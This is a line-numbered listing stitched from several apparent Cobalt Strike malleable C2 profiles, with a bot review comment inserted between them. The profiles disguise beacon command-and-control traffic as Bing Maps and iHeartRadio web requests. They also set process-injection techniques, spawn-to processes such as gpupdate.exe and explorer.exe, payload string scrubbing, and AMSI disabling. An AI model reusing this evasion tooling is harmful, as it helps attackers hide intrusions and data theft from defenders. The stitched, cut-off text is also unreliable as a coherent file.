310 string "{55 89 e5 53 57 56 8b ?? ?? 85 f6 74 ?? 8b ?? ?? 6a 00 53 e8 ?? ?? ?? ?? 83 c4 08 a8 01 75 ?? 8b ?? ?? ?? ?? ?? 89 f9 e8 ?? ?? ?? ?? 89 c1 0f ?? ?? 66 ?? ?? 66 ?? ?? 74 ?? bb 01 00 00 00 eb ?? 89 d8 99 f7 f9 0f ?? ?? ?? 8b ?? ?? 66 ?? ?? ?? 66 ?? ?? ?? 8d ?? ?? 74 ?? 8d ?? ?? 66 83 fa 5f 72 ?? 66 83 f8 0d 77 ?? ba 00 26 00 00 0f a3 c2 72 ?? eb ?? 31 f6 eb ?? 89 de eb ?? 8b ?? ?? 89 f0 5e 5f 5b 5d c3}
311 ";
312
313 }
314
315 ###Process Inject Block###
316 process-inject {
317
318 #set allocator "NtMapViewOfSection";
319
320 set min_alloc "16700";
321
322 set userwx "false";
323
324 set startrwx "false";
325
326 transform-x86 {
327 #prepend "\x90\x90\x90";
328 }
329 transform-x64 {
330 #prepend "\x90\x90\x90";
331 }
332
333 execute {
334 CreateThread;
335 CreateRemoteThread;
336
337 CreateThread "ntdll.dll!RtlUserThreadStart+0x1000";
338
339 SetThreadContext;
340
341 NtQueueApcThread-s;
342
343 #NtQueueApcThread;
344
345 CreateRemoteThread "kernel32.dll!LoadLibraryA+0x1000";
346
347 RtlCreateUserThread;
348 }
349 }
350
351 ###Post-Ex Block###
352 post-ex {
353
354 set spawnto_x86 "%windir%\\syswow64\\explorer.exe";
355 set spawnto_x64 "%windir%\\sysnative\\explorer.exe";
356
357 set obfuscate "false";
358
359 set smartinject "false";
360
361 set amsi_disable "false";
362
363 }
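Review bot: `set sleep_mask "false";` appears twice in the stage block, on lines 286 and 291, so one of the two is redundant and should be dropped; the preceding profile in this commit carries the same duplicate in its stage block (its lines 283 and 294). Separately, the second `string` entry on line 310 has its closing quote on line 311, which embeds a trailing newline in the value; if that line break is not intended, the quote belongs at the end of line 310, `... 89 f0 5e 5f 5b 5d c3}";`. I am inferring from the other multi-line string values in these profiles that the parser accepts embedded newlines, so this is a fidelity question rather than a parse error — worth confirming against the malleable parser.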
0 #bing maps profile
1 #xx0hcd
2
3 ###Global Options###
4 set sample_name "bing_maps.profile";
5
6 set sleeptime "38500";
7 set jitter "27";
8 set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36";
9
10 set host_stage "false";
11
12 ###DNS options###
13 set dns_idle "8.8.8.8";
14 set maxdns "245";
15 set dns_sleep "0";
16 set dns_stager_prepend "";
17 set dns_stager_subhost "";
18 set dns_max_txt "252";
19 set dns_ttl "1";
20
21 ###SMB options###
22 set pipename "ntsvcs";
23 set pipename_stager "scerpc";
24 set smb_frame_header "";
25
26 ###TCP options###
27 set tcp_port "8000";
28 set tcp_frame_header "";
29
30 ###SSH BANNER###
31 set ssh_banner "Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-1065-aws x86_64)";
32
33 ###SSL Options###
34 #https-certificate {
35 # set keystore "domain001.store";
36 # set password "password123";
37 #}
38
39 #code-signer {
40 #set keystore "your_keystore.jks";
41 #set password "your_password";
42 #set alias "server";
43 #}
44
45 ###HTTP-Config Block###
46 #http-config {
47 # set headers "Server, Content-Type";
48 # header "Content-Type" "text/html;charset=UTF-8";
49 # header "Server" "nginx";
50 #
51 # set trust_x_forwarded_for "false";
52 #}
53
54 ###HTTP-GET Block###
55 http-get {
56
57 set uri "/maps/overlaybfpr";
58
59 client {
60
61 header "Host" "www.bing.com";
62 header "Accept" "*/*";
63 header "Accept-Language" "en-US,en;q=0.5";
64 header "Connection" "close";
65
66
67 metadata {
68 base64;
69
70 prepend "_SS=";
71 prepend "SRCHD=AF=NOFORM;";
72 header "Cookie";
73
74 }
75
76 parameter "q" "san%20diego%20ca%20zoo";
77
78 }
79
80 server {
81
82 header "Cache-Control" "public";
83 header "Content-Type" "text/html;charset=utf-8";
84 header "Vary" "Accept-Encoding";
85 header "P3P" "\"NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND\"";
86 header "X-MSEdge-Ref" "Ref A: 20D7023F4A1946FEA6E17C00CC8216CF Ref B: DALEDGE0715";
87 header "Connection" "close";
88
89 output {
90
91 base64;
92
93 prepend "{
94 \"_type\": \"Suggestions\",
95 \"instrumentation\": {
96 \"pingUrlBase\": \"https://www.bing.com/api/ping?IG=22592B48742E48B7B855897EE3CA6400&CID=34823DAF741A65682A9032BA75E66427&ID=\",
97 \"pageLoadPingUrl\": \"https://www.bing.com/api/ping/pageload?IG=22592B48742E48B7B855897EE3CA6400&CID=34823DAF741A65682A9032BA75E66427&Type=Event.CPT&DATA=0\"
98 },
99 \"queryContext\": {
100 \"originalQuery\": \"san diego ca zoo\"
101 },
102 \"value\": [{
103 \"_type\": \"Place\",
104 \"id\": \"sid:\"";
105
106
107
108
109
110 append "\"
111 \"readLink\": \"https://www.bing.com/api/v6/localentities/dbb1c326-5b67-4591-a264-0929e070e5ee\",
112 \"readLinkPingSuffix\": \"DevEx,5018.1\",
113 \"entityPresentationInfo\": {
114 \"entityScenario\": \"ListItem\",
115 \"entitySubTypeHints\": [\"PopulatedPlace\"]
116 },
117 \"geo\": {
118 \"latitude\": 32.7157,
119 \"longitude\": -117.162
120 },
121 \"address\": {
122 \"addressLocality\": \"San Diego\",
123 \"addressSubregion\": \"San Diego County\",
124 \"addressRegion\": \"California\",
125 \"addressCountry\": \"United States\",
126 \"countryIso\": \"US\",
127 \"text\": \"San Diego, California\"
128 },
129 \"formattingRuleId\": \"US\"
130 }, {
131 \"_type\": \"LocalBusiness\",
132 \"id\": \"local_ypid:\"YN873x13020856635161814\"\",
133 \"readLink\": \"https://www.bing.com/api/v6/localbusinesses/YN873x13020856635161814\",
134 \"readLinkPingSuffix\": \"DevEx,5019.1\",
135 \"name\": \"San Diego Zoo\",
136 \"geo\": {
137 \"latitude\": 32.7353,
138 \"longitude\": -117.149
139 },
140 \"address\": {
141 \"streetAddress\": \"2920 Zoo Dr\",
142 \"addressLocality\": \"San Diego\",
143 \"addressRegion\": \"CA\",
144 \"postalCode\": \"92101\",
145 \"addressCountry\": \"United States\",
146 \"countryIso\": \"US\",
147 \"text\": \"2920 Zoo Dr, San Diego, CA 92101\"
148 },
149 \"formattingRuleId\": \"US\",
150 \"categories\": [\"90000.90001.90012.90017\"]
151 }, {
152 \"_type\": \"Place\",
153 \"id\": \"sid:\"63101d85-2568-910b-fee1-2518175b6a48\"\",
154 \"readLink\": \"https://www.bing.com/api/v6/localentities/63101d85-2568-910b-fee1-2518175b6a48\",
155 \"readLinkPingSuffix\": \"DevEx,5020.1\",
156 \"entityPresentationInfo\": {
157 \"entityScenario\": \"ListItem\",
158 \"entitySubTypeHints\": [\"PopulatedPlace\"]
159 },
160 \"geo\": {
161 \"latitude\": 10.2573,
162 \"longitude\": -67.9548
163 },
164 \"address\": {
165 \"addressLocality\": \"San Diego\",
166 \"addressRegion\": \"Carabobo\",
167 \"addressCountry\": \"Venezuela\",
168 \"countryIso\": \"VE\",
169 \"text\": \"San Diego, Carabobo\"
170 }";
171
172
173 print;
174 }
175 }
176 }
177
178
179
180 ###HTTP-Post Block###
181 http-post {
182
183 set uri "/fd/ls/lsp.aspx";
184 #set verb "GET";
185 set verb "POST";
186
187 client {
188
189 header "Host" "www.bing.com";
190 header "Accept" "*/*";
191 header "Accept-Language" "en-US";
192 header "Content-Type" "text/xml";
193 header "Connection" "close";
194
195 output {
196 base64url;
197
198 prepend "SRCHUID=";
199 prepend "SRCHD=AF=NOFORM;";
200 header "Cookie";
201 }
202
203 id {
204 base64url;
205 parameter "lid";
206
207 }
208 }
209
210 server {
211
212 header "Cache-Control" "public, max-age=31536000";
213 header "Content-Type" "application/json";
214 header "Vary" "Accept-Encoding";
215 header "X-Cache" "TCO_HIT";
216 header "Server" "Microsoft-IIS/10.0";
217 header "X-AspNet-Version" "4.0.30319";
218 header "X-Powered-By" "ASP.NET";
219
220 output {
221 netbios;
222
223 prepend "{
224 \"categoryMap\": [
225 {
226 \"categoryId\": 91263,
227 \"bucketId\": 1848,
228 \"entry\": \"CommunityPoint\"
229 },
230 {
231 \"categoryId\": 90892,
232 \"bucketId\": 1899,
233 \"entry\": \"Transit\"
234 },
235 {
236 \"categoryId\": 90014,
237 \"bucketId\": 300,
238 \"entry\": \"ZXlJeE5DSTZleUoyWldOMGIzSkpiV0ZuWlNJNmV5SnlaV052Y21SeklqcGJleUp6WTJGc1pWQmhiR1YwZEdWTFpYbEpaQ0k2TFRFc0luTm9ZWEJsVUdGc1pYUjBaVXRsZVVsa0lqb3RNU3dpWjJWdmJXVjBjbmxUZEhKcGJtY2lPaUpOTWk0Mk56Z3NNVEJvTFRVdU16VTFWall1TlROb0xUTXVNalFnSUdNdE1DNDVPREVzTUM0d01qSXRNUzQzTlMwd0xqTTVOQzB5TGpFNE1TMHhMakE1TW1NdE1DNHpNamN0TUM0MU16TXRNQzQxT0RNdE1TNDBORElzTUM0d056SXRNaTQzTld3d0xqRXpOeTB3TGpJek1Xd3hMalU0T1MweUxqSXlNaUFnWXkwd0xqSTFOUzB3TGpFNE15MHdMalEyTmkwd0xqUXhPQzB3TGpZeE9TMHdMamN3TVdNdE1DNDBOREV0TUM0NE1Ua3RNQzR6TFRFdU56ZzJMREF1TkRFNExUSXVPRGN6YkRFdU5qTTVMVEl1TXpJell5MHdMakF6TXkwd0xqQTBOaTB3TGpBMkxUQXVNRGc1TFRBdU1EZzBMVEF1TVRNZ0lHTXRNQzR5TlMwd0xqUXlNeTB3TGpVM01TMHhMak14TlN3d0xqQTVPUzB5TGpVek4yd3lMamN6T0MwMExqRTVPRU10TVM0M05TMHhNeTR5TnkweExqQXlPQzB4TkN3d0xqQXhPQzB4TkdNd0xqWXdPU3d3TERFdU5EYzRMREF1TWpVMExESXVNVFU0TERFdU5EVTViREl1T0RFM0xEUXVPRGNnSUdNd0xqRXhOU3d3TGpRNE1pd3dMakE1TXl3eExqRTNPUzB3TGpJNE1Td3hMamM1T0d3eExqZzBOU3d5TGpZek0yTXdMalExT1N3d0xqY3pOU3d3TGpjd09Dd3hMamMyTWl3d0xqRTVOU3d5TGpZNE0wTTJMall4Tmkwd0xqTXhNeXcyTGpReE1pMHdMakExTVN3MkxqRXdPU3d3TGpFM01pQWdiREl1TURFekxESXVOemMwUXpndU5EUTFMRE11TlRjeExEZ3VOakU0TERRdU5UUXNPQzR4TWpZc05TNHpOemhqTFRBdU1qUXpMREF1TkRFekxUQXVPRFExTERFdU1URXpMVEl1TVRVc01TNHhOVFJJTWk0Mk56aFdNVEI2SWl3aVptbHNiRlpoYkhWbFNXUWlPakkwTENKemRISnZhMlZXWVd4MVpVbGtJam94TENKemRISnZhMlZYYVdSMGFDSTZNU3dpYzNSeWIydGxVMk5oYkdWUVlXeGxkSFJsUzJWNVNXUWlPaTB4TENKeVpXTnZjbVJVZVhCbElqb2lVR0YwYUNKOQ==\"
239 },
240 {
241 \"categoryId\": 90595,
242 \"bucketId\": 311,
243 \"entry\": \"RealEstatePoint\"
244 },
245 {
246 \"categoryId\": 91616,
247 \"bucketId\": 257,
248 \"entry\": \"AquariumPoint\"
249 },
250 {
251 \"categoryId\": 90954,
252 \"bucketId\": 277,
253 \"entry\": \"ArtGalleryPoint\"
254 },
255 {
256 \"categoryId\": 90001,
257 \"bucketId\": 258,
258 \"entry\": \"UEhOamNtbHdkQ0IwZVhCbFBTSjBaWGgwTDJwaGRtRnpZM0pwY0hRaUlHTnliM056YjNKcFoybHVQU0poYm05dWVXMXZkWE1pSUhOeVl6MGlMM0p3TDBScWNrUjZOMU5ZYlhOMWRYZHhRMlI1WldsdlFsWXpPWGhKV1M1bmVpNXFjeUkrUEM5elkzSnBjSFErUEhOamNtbHdkQ0IwZVhCbFBTSjBaWGgwTDJwaGRtRnpZM0pwY0hRaVBnPT0=\"
259 },
260 {
261 \"categoryId\": 90133,
262 \"bucketId\": 278,
263 \"entry\": \"ATMPoint\"
264 },
265 {
266 \"categoryId\": 90078,
267 \"bucketId\": 330,
268 \"entry\": \"AutomobileRepairPoint\"
269 },
270 {
271 \"categoryId\": 91186,
272 \"bucketId\": 327,
273 \"entry\": \"FoodPoint\"
274 },
275 {
276 \"categoryId\": 90122,
277 \"bucketId\": 279,
278 \"entry\": \"BankPoint\"
279 },
280 {
281 \"categoryId\": 90243,
282 \"bucketId\": 284,
283 \"entry\": \"BarPoint\"
284 },
285 {
286 \"categoryId\": 91204,
287 \"bucketId\": 308,
288 \"entry\": \"BarAndGrillPoint\"
289 },
290 {
291 \"categoryId\": 91576,
292 \"bucketId\": 1851,
293 \"entry\": \"AttractionPoint\"
294 },
295 {
296 \"categoryId\": 90353,
297 \"bucketId\": 1972,
298 \"entry\": \"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\"
299 },
300 {
301 \"categoryId\": 90940,
302 \"bucketId\": 329,
303 \"entry\": \"MarinaPoint\"
304 },
305 {
306 \"categoryId\": 90650,
307 \"bucketId\": 1365,
308 \"entry\": \"BookstorePoint\"
309 },
310 {
311 \"categoryId\": 91533,
312 \"bucketId\": 271,
313 \"entry\": \"BowlingPoint\"
314 },
315 {
316 \"categoryId\": 91647,
317 \"bucketId\": 1382,
318 \"entry\": \"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\"
319 },
320 {
321 \"categoryId\": 255,
322 \"bucketId\": 254,
323 \"entry\": \"Transit\"
324 },
325 {
326 \"categoryId\": 257,
327 \"bucketId\": 253,
328 \"entry\": \"Transit\"
329 },
330 {
331 \"categoryId\": 264,
332 \"bucketId\": 243,
333 \"entry\": \"Transit\"
334 },
335 {
336 \"categoryId\": 263,
337 \"bucketId\": 241,
338 \"entry\":";
339
340
341
342
343
344 append " },
345 {
346 \"categoryId\": 266,
347 \"bucketId\": 236,
348 \"entry\": \"Transit\"
349 },
350 {
351 \"categoryId\": 251,
352 \"bucketId\": 252,
353 \"entry\": \"Transit\"
354 },
355 {
356 \"categoryId\": 265,
357 \"bucketId\": 242,
358 \"entry\": \"Transit\"
359 },
360 {
361 \"categoryId\": 253,
362 \"bucketId\": 251,
363 \"entry\": \"Transit\"
364 },
365 {
366 \"categoryId\": 254,
367 \"bucketId\": 250,
368 \"entry\": \"ZXlJek1DSTZleUoyWldOMGIzSkpiV0ZuWlNJNmV5SnlaV052Y21SeklqcGJleUp6WTJGc1pWQmhiR1YwZEdWTFpYbEpaQ0k2TkRJNUxDSnphR0Z3WlZCaGJHVjBkR1ZMWlhsSlpDSTZORE13TENKblpXOXRaWFJ5ZVZOMGNtbHVaeUk2SWsweE15MHdMakF4TkRZeE1ESTVZekFzTWk0eE9UZ3RNU3cwTGpFek1TMHlMalV4TWl3MUxqSTRNVU0zTGpjeU5pdzNMakUzTWpNNUxETXVOelUwTERjdU9UZzFNemtzTUN3M0xqazROVE01Y3kwM0xqY3lOaTB3TGpneE15MHhNQzQwT0RndE1pNDNNVGxETFRFeUxEUXVNVEUyTXprdE1UTXNNaTR4T0RNek9TMHhNeTB3TGpBeE5EWXhNREk1WXpBdE1pNHhPVGNzTVMwMExqRXpNaXd5TGpVeE1pMDFMakk0TVVNdE55NDNNall0Tnk0eU1EQTJNUzB6TGpjMU5DMDRMakF4TkRZeExEQXRPQzR3TVRRMk1YTTNMamN5Tml3d0xqZ3hOQ3d4TUM0ME9EZ3NNaTQzTVRrZ0lFTXhNaTAwTGpFME5qWXhMREV6TFRJdU1qRXhOakVzTVRNdE1DNHdNVFEyTVRBeU9Yb2lMQ0ptYVd4c1ZtRnNkV1ZKWkNJNk5URXNJbk4wY205clpWWmhiSFZsU1dRaU9qVXlMQ0p6ZEhKdmEyVlhhV1IwYUNJNk1Td2ljM1J5YjJ0bFUyTmhiR1ZRWVd4bGRIUmxTMlY1U1dRaU9pMHhMQ0p5WldOdmNtUlVlWEJsSWpvaVVHRjBhQ0o5TEhzaWMyTmhiR1ZRWVd4bGRIUmxTMlY1U1dRaU9qUXpNaXdpYzJoaGNHVlFZV3hsZEhSbFMyVjVTV1FpT2pRek15d2liR1ZtZEZSdmNDSTZleUo0SWpvdE9TNHpOekF4TENKNUlqb3RPQzR3T0RNd01EaDlMQ0p5YVdkb2RFSnZkSFJ2YlNJNmV5SjRJam94TUM0ek56QXhNeXdpZVNJNk9DNHdPRE13TURoOUxDSjBaWGgwVTNSNWJHVWlPbnNpWm05dWRFWmhiV2xzZVVsa0lqbzRMQ0ptYjI1MFUybDZaU0k2T1N3aWJXbHVhVzExYlVadmJuUlRhWHBsSWpvNUxDSm9aV2xuYUhSTllYUmphRTF2WkdVaU9qQXNJbWhsYVdkb2RFMWhkR05vVUdsNFpXeHpJam93TENKbWIyNTBVM1I1YkdVaU9qQXNJblJsZUhSRWNtRjNVMlYwZEdsdVozTWlPakFzSW1OdmJHOXlWbUZzZFdWSlpDSTZOVE1zSW1kc2IzZFRhWHBsSWpvekxDSnpaV052Ym1SSGJHOTNVMmw2WlNJNk9Td2lZV3h3YUdGR2JHOXZjaUk2TVRjMUxDSm5iRzkzUTI5c2IzSldZV3gxWlVsa0lqbzNMQ0p2ZFhSc2FXNWxRMjlzYjNKV1lXeDFaVWxrSWpvM0xDSnZkWFJzYVc1bFYybGtkR2dpT2pCOUxDSnpkSEpwYm1kVGIzVnlZMlZKWkNJNk5ETTBMQ0p6ZEhKcGJtZFRiM1Z5WTJWVWVYQmxJam95TENKb2IzSnBlbTl1ZEdGc1FXeHBaMjV0Wlc1MElqb3dMQ0oyWlhKMGFXTmhiRUZzYVdkdWJXVnVkQ0k2TUN3aWFHOXlhWHB2Ym5SaGJFRjFkRzlUWTJGc2FXNW5Jam94TENKMlpYSjBhV05oYkVGMWRHOVRZMkZzYVc1bklqb3hMQ0p5WldOdmNtUlVlWEJsSWpvaVZHVjRkQ0o5WFgxOWZRPT0=\"
369 },
370 {
371 \"categoryId\": 260,
372 \"bucketId\": 229,
373 \"entry\": \"Transit\"
374 },
375 {
376 \"categoryId\": 267,
377 \"bucketId\": 226,
378 \"entry\": \"Transit\"
379 },
380 {
381 \"categoryId\": 252,
382 \"bucketId\": 249,
383 \"entry\": \"Transit\"
384 },
385 {
386 \"categoryId\": 91714,
387 \"bucketId\": 66,
388 \"entry\": \"FinancialPoint\"
389 },
390 {
391 \"categoryId\": 203,
392 \"bucketId\": 248,
393 \"entry\": \"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\"
394 },
395 {
396 \"categoryId\": 91754,
397 \"bucketId\": 65,
398 \"entry\": \"Transit\"
399 },
400 {
401 \"categoryId\": 205,
402 \"bucketId\": 247,
403 \"entry\": \"Transit\"
404 },
405 {
406 \"categoryId\": 91649,
407 \"bucketId\": 281,
408 \"entry\": \"CafePoint\"
409 },
410 {
411 \"categoryId\": 91562,
412 \"bucketId\": 1366,
413 \"entry\": \"CampPoint\"
414 },
415 {
416 \"categoryId\": 90977,
417 \"bucketId\": 331,
418 \"entry\": \"\"
419 },
420 {
421 \"categoryId\": 90903,
422 \"bucketId\": 274,
423 \"entry\": \"AutomobileRentalPoint\"
424 },
425 {
426 \"categoryId\": 90024,
427 \"bucketId\": 303,
428 \"entry\": \"CasinoPoint\"
429 },
430 {
431 \"categoryId\": 91622,
432 \"bucketId\": 1839,
433 \"entry\": \"AttractionPoint\"
434 },
435 {
436 \"categoryId\": 91252,
437 \"bucketId\": 1846,
438 \"entry\": \"PalacePoint\"
439 },
440 {
441 \"categoryId\": 90619,
442 \"bucketId\": 1847,
443 \"entry\": \"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=\"
444 },
445 {
446 \"categoryId\": 91703,
447 \"bucketId\": 1849,
448 \"entry\": \"CommunityPoint\"
449 },
450 {
451 \"categoryId\": 90386,
452 \"bucketId\": 1367,
453 \"entry\": \"ClinicPoint\"
454 },
455 {
456 \"categoryId\": 90188,
457 \"bucketId\": 295,
458 \"entry\": \"EducationPoint\"
459 },
460 {
461 \"categoryId\": 90584,
462 \"bucketId\": 310,
463 \"entry\": \"CommunityPoint\"
464 }";
465
466 print;
467 }
468 }
469 }
470
471
472
473 ###HTTP-Stager Block###
474 http-stager {
475 set uri_x86 "/maps/overlayBFPR";
476 set uri_x64 "/maps/overlayBfpr";
477
478 client {
479
480 header "Host" "www.bing.com";
481 header "Accept" "*/*";
482 header "Accept-Language" "en-US,en;q=0.5";
483 header "Connection" "close";
484 }
485
486 server {
487
488 header "Cache-Control" "public";
489 header "Content-Type" "text/html;charset=utf-8";
490 header "Vary" "Accept-Encoding";
491 header "P3P" "\"NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND\"";
492 header "X-MSEdge-Ref" "Ref A: 20D7023F5A1946FFA6E18C00CC8216CF Ref B: DALEDGE0815";
493 header "Connection" "close";
494
495 output {
496
497 print;
498 }
499 }
500 }
501
502
503 ###Malleable PE/Stage Block###
504 stage {
505 set checksum "0";
506 set compile_time "12 Dec 2019 02:52:11";
507 set entry_point "170000";
508 #set image_size_x86 "6586368";
509 #set image_size_x64 "6586368";
510 #set name "WWanMM.dll";
511 set userwx "false";
512 set cleanup "true";
513 set sleep_mask "true";
514 set stomppe "true";
515 set obfuscate "true";
516 set rich_header "";
517
518 set sleep_mask "true";
519
520 set smartinject "true";
521
522 set module_x86 "wwanmm.dll";
523 set module_x64 "wwanmm.dll";
524
525 transform-x86 {
526 prepend "\x90\x90\x90";
527 strrep "ReflectiveLoader" "";
528 strrep "beacon.dll" "";
529 }
530
531 transform-x64 {
532 prepend "\x90\x90\x90";
533 strrep "ReflectiveLoader" "";
534 strrep "beacon.x64.dll" "";
535 }
536
537 #string "something";
538 #data "something";
539 #stringw "something";
540 }
541
542 ###Process Inject Block###
543 process-inject {
544
545 set allocator "NtMapViewOfSection";
546
547 set min_alloc "16700";
548
549 set userwx "false";
550
551 set startrwx "true";
552
553 transform-x86 {
554 prepend "\x90\x90\x90";
555 }
556 transform-x64 {
557 prepend "\x90\x90\x90";
558 }
559
560 execute {
561 #CreateThread;
562 #CreateRemoteThread;
563
564 CreateThread "ntdll.dll!RtlUserThreadStart+0x1000";
565
566 SetThreadContext;
567
568 NtQueueApcThread-s;
569
570 #NtQueueApcThread;
571
572 CreateRemoteThread "kernel32.dll!LoadLibraryA+0x1000";
573
574 RtlCreateUserThread;
575 }
576 }
577
578 ###Post-Ex Block###
579 post-ex {
580
581 set spawnto_x86 "%windir%\\syswow64\\gpupdate.exe";
582 set spawnto_x64 "%windir%\\sysnative\\gpupdate.exe";
583
584 set obfuscate "true";
585
586 set smartinject "true";
587
588 set amsi_disable "true";
589
590 }
0 #iheartradio
1 #chose a popular top 40 station 'hit-nation'..
2 #xx0hcd
3
4 set sleeptime "30000";
5 set jitter "20";
6 set useragent "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko)";
7 set dns_idle "8.8.8.8";
8 set maxdns "235";
9
10 #custom cert
11 #https-certificate {
12 # set keystore "your_store_file.store";
13 # set password "your_store_pass";
14 #}
15
16 http-config {
17 # set headers "Server, Content-Type, Cache-Control, Connection";
18 # header "Content-Type" "text/html;charset=UTF-8";
19 # header "Connection" "close";
20 # header "Cache-Control" "max-age=2";
21 # header "Server" "nginx";
22 #set "true" if teamserver is behind redirector
23 set trust_x_forwarded_for "false";
24 }
25
26 http-get {
27
28 set uri "/live/hit-nation-4222/";
29
30 client {
31
32 header "Host" "www.iheart.com";
33 header "Accept" "*/*";
34 header "Accept-Language" "en-US";
35 header "Connection" "close";
36
37
38 metadata {
39 base64url;
40
41 prepend "GED_PLAYLIST_ACTIVITY=";
42 prepend "_gads=ID=53c4a:S=ALNI_M32;";
43 prepend "uid=1492;";
44 prepend "pid=3913;";
45 prepend "ihr_c=US;id=HdqX;";
46 header "Cookie";
47
48 }
49
50 }
51
52 server {
53
54 header "Content-Type" "text/html; charset=utf-8";
55 header "Edge-Control" "cache-maxage=3600";
56 header "Server" "nginx/1.4.6 (Ubuntu)";
57 header "X-Powered-By" "Express";
58 header "Access-Control-Allow-Origin" "*";
59 header "Accept-Ranges" "bytes";
60 header "Via" "1.1 varnish";
61 header "Age" "315";
62 header "Connection" "close";
63 header "X-Served-By" "cache-dfw1822-DFW";
64 header "X-Cache" "HIT";
65 header "X-Cache-Hits" "1";
66 header "X-Timer" "S1499866924.089752,VS0,VE1";
67
68
69 output {
70
71 base64url;
72
73 prepend "<!DOCTYPE html>
74 <html lang='en' xmlns:fb='http://ogp.me/ns/fb'>
75 <head>
76 <title>Listen to Hit Nation Radio Live - All of Today's Biggest Hits | iHeartRadio</title>
77 <meta data-react-helmet='true' charset='utf-8'/><meta data-react-helmet='true' name='viewport' content='width=device-width, initial-scale=1, maximum-scale=1.0, user-scalable=no'/><meta data-react-helmet='true' name='mobile-web-app-capable' content='yes'/> <link data-react-helmet='true' rel='shortcut icon' href='/assets/favicon.cf2eff6db48eda72637f3c01d6ce99ae.ico?rev=7.33.1' type='image/ico'/><link data-react-helmet='true' rel='apple-touch-icon' href='/assets/apple-touch-icon.40395b8a92866d7206175b320b251cd3.png?rev=7.33.1'/><link data-react-helmet='true' rel='shortcut icon' href='/assets/apple-touch-icon.40395b8a92866d7206175b320b251cd3.png?rev=7.33.1'/><link data-react-helmet='true' rel='chrome-webstore-item' href='https://chrome.google.com/webstore/detail/iheartradio/djfamdpdfnbdehpafbeefbpobbohmfnc'/><link data-react-helmet='true' rel='manifest' href='/assets/manifest.828b7817d23e2d62cf3d7e797ae0056f.json?rev=7.33.1'/>
78 <link rel='alternate' href='android-app://com.clearchannel.iheartradio.controller/ihr/goto/live/4422' data-reactid='2'/><link rel='alternate' href='ios-app://290638154/ihr/goto/live/4422' data-reactid='3'/><link rel='search' type='application/opensearchdescription+xml' title='iHeartRadio' href='/assets/opensearch.bb1705850ffcb01dd81ec10d6e177d1c.xml?rev=7.33.1' data-reactid='4'/><link href='https://plus.google.com/+iHeartRadio' rel='author' data-reactid='5'/><link href='https://plus.google.com/+iHeartRadio' rel='publisher' data-reactid='6'/><link rel='canonical' href='https://www.iheart.com/live/hit-nation-4422/' data-reactid='7'/><link rel='image_src' href='https://iscale.iheart.com/catalog/live/4422' data-reactid='8'/><meta name='thumbnail' content='https://iscale.iheart.com/catalog/live/4422' data-reactid='9'/><meta name='description' content='Listen to Hit Nation Live for Free! Hear All of Today&#x27;s Biggest Hits, only on iHeartRadio.' data-reactid='10'/><meta name='keywords' content='Listen,Live,Hit Nation,Digital,NAT,Music,Talk,Radio,Top 40 &amp; Pop,Online,Streaming,Free,iHeartRadio,iHeart' data-reactid='11'/><meta name='twitter:label1' content='Genre' data-reactid='12'/><meta name='twitter:data1' content='Top 40 &amp; Pop' data-reactid='13'/><meta name='twitter:label2' content='Location' data-reactid='14'/><meta name='twitter:data2' content='DIGITAL-NAT' data-reactid='15'/><meta property='fb:app_id' content='121897277851831' data-reactid='16'/> content='https://iscale.iheart.com/catalog/live/4422' data-reactid='21'/>
79 <style class='server-style-loader-element'><href='https://www.iheart.com/live/hit-nation-4422/?autoplayid=";
80
81
82 append "<meta property='og:site_name' content='iHeartRadio' data-reactid='22'/><meta property='og:description' content='Listen to Hit Nation Live for Free! Stream Top 40 &amp; Pop songs online from this radio station, only on iHeartRadio.' data-reactid='23'/><meta itemprop='name' content='Listen to Hit Nation Radio Live - All of Today&#x27;s Biggest Hits' data-reactid='24'/><meta name='twitter:app:name:googleplay' content='iHeartRadio' data-reactid='46'/><meta name='twitter:app:id:googleplay' content='com.clearchannel.iheartradio.controller' data-reactid='47'/><meta property='al:ios:app_store_id' content='290638154' data-reactid='48'/><meta property='al:ios:app_name' content='iHeartRadio' data-reactid='49'/><meta property='al:android:package' content='com.clearchannel.iheartradio.controller' data-reactid='50'/><meta property='al:android:app_name' content='iHeartRadio' data-reactid='51'/>
83 <link rel='stylesheet' type='text/css' href='/assets/web-styles.c28d83ef1f71cb7b9282646a7edecdb0.css?rev=7.33.1'></link>
84 </div></div></div><div id='dialog' data-reactid='103'></div><div id='dialog-secondary' data-reactid='104'></div><div data-reactid='105'><!-- react-empty: 106 --></div><!-- react-empty: 107 --><div data-reactid='108'></div><div data-reactid='109'></div><div class='growls no-growls' data-reactid='110'></div><div class='adblock-bait pub_300x250 pub_300x250m pub_728x90 text-ad textAd text_ad text_ads text-ads text-ad-links' data-reactid='111'></div></div></div>
85 <div id='jw-wrapper' class='hidden'>
86 <div id='jw-player'></div>
87 </div>
88 <div id='ads-wrapper' class='hidden'>
89 <a id='ads-learn-more' target='_blank'>Learn More</a>
90 <div id='ads-player'></div>
91 </div>
92 <script src=/a/locale/?rel=7.33.1></script>
93 <script src=/assets/vendor.a465f0a08a077b19e744.js?rev=7.33.1></script>
94 <script src=/assets/web.a465f0a08a077b19e744.js?rev=7.33.1></script>
95 </body>
96 </html>";
97
98 print;
99 }
100 }
101 }
102
103 http-post {
104
105 set uri "/Live/hit-nation-4222/";
106 set verb "GET";
107
108 client {
109
110 header "Host" "www.iheart.com";
111 header "Accept" "*/*";
112
113 output {
114 base64url;
115
116 prepend "GED_PLAYLIST_ACTIVITY=";
117 prepend "_gads=ID=53c4a:S=ALNI_M32;";
118 prepend "uid=1492;";
119 prepend "pid=3913;";
120 prepend "ihr_c=US;id=HdqX;";
121 header "Cookie";
122
123
124 }
125
126
127 id {
128 base64url;
129
130 parameter "autoplay";
131
132 }
133 }
134
135 server {
136
137 header "Content-Type" "text/html; charset=utf-8";
138 header "Edge-Control" "cache-maxage=3600";
139 header "Server" "nginx/1.4.6 (Ubuntu)";
140 header "X-Powered-By" "Express";
141 header "Access-Control-Allow-Origin" "*";
142 header "Accept-Ranges" "bytes";
143 header "Via" "1.1 varnish";
144 header "Age" "315";
145 header "Connection" "close";
146 header "X-Served-By" "cache-dfw1822-DFW";
147 header "X-Cache" "HIT";
148 header "X-Cache-Hits" "1";
